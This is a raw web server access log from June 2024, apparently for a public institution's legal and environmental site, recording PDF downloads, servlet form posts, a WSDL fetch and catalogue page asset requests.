190.157.70.191 - - [25/Jun/2024:08:10:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6846.pdf HTTP/1.1" 200 3160297
66.249.66.19 - - [25/Jun/2024:08:10:33 -0500] "GET /BLA/resoluciones/AUTOS%202023/08536.pdf HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:10:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 34
201.245.192.253 - - [25/Jun/2024:08:10:36 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 172
201.245.192.253 - - [25/Jun/2024:08:10:37 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 145
201.245.192.253 - - [25/Jun/2024:08:10:37 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 157
201.245.192.253 - - [25/Jun/2024:08:10:37 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 165
201.245.192.253 - - [25/Jun/2024:08:10:37 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 165
201.245.192.253 - - [25/Jun/2024:08:10:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 332
201.245.192.253 - - [25/Jun/2024:08:10:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 117
201.245.192.253 - - [25/Jun/2024:08:10:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [25/Jun/2024:08:10:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 77
201.245.192.253 - - [25/Jun/2024:08:10:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 33
201.245.192.253 - - [25/Jun/2024:08:10:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 191
201.245.192.253 - - [25/Jun/2024:08:10:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 173
201.245.192.253 - - [25/Jun/2024:08:10:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 158
201.245.192.253 - - [25/Jun/2024:08:10:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 175
201.245.192.253 - - [25/Jun/2024:08:10:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 159
201.245.192.253 - - [25/Jun/2024:08:10:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 158
201.245.192.253 - - [25/Jun/2024:08:10:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 58
201.245.192.253 - - [25/Jun/2024:08:10:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 33
201.245.192.253 - - [25/Jun/2024:08:10:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 32
201.245.192.253 - - [25/Jun/2024:08:10:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 32
201.245.192.253 - - [25/Jun/2024:08:10:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 32
201.245.192.253 - - [25/Jun/2024:08:10:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 32
216.244.66.195 - - [25/Jun/2024:08:10:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3778.pdf HTTP/1.1" 200 377269
201.245.192.253 - - [25/Jun/2024:08:10:47 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 208
201.245.192.253 - - [25/Jun/2024:08:10:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 730
201.245.192.253 - - [25/Jun/2024:08:10:50 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 44
216.244.66.195 - - [25/Jun/2024:08:11:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1235.pdf HTTP/1.1" 200 359865
201.245.192.253 - - [25/Jun/2024:08:11:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:08:11:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [25/Jun/2024:08:10:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [25/Jun/2024:08:11:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1931.pdf HTTP/1.1" 200 2046333
44.222.64.76 - - [25/Jun/2024:08:12:09 -0500] "GET /dia-mundial-del-agua-2023-programate-para-participar-en-estas-actividades-de-educacion-ambiental.html HTTP/1.1" 304 -
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 27040
216.244.66.195 - - [25/Jun/2024:08:12:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2253.pdf HTTP/1.1" 200 254661
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
186.28.225.185 - - [25/Jun/2024:08:12:16 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [25/Jun/2024:08:12:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:08:10:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
172.22.2.4 - - [25/Jun/2024:08:12:44 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1139&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 626
216.244.66.195 - - [25/Jun/2024:08:12:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2279.pdf HTTP/1.1" 200 988597
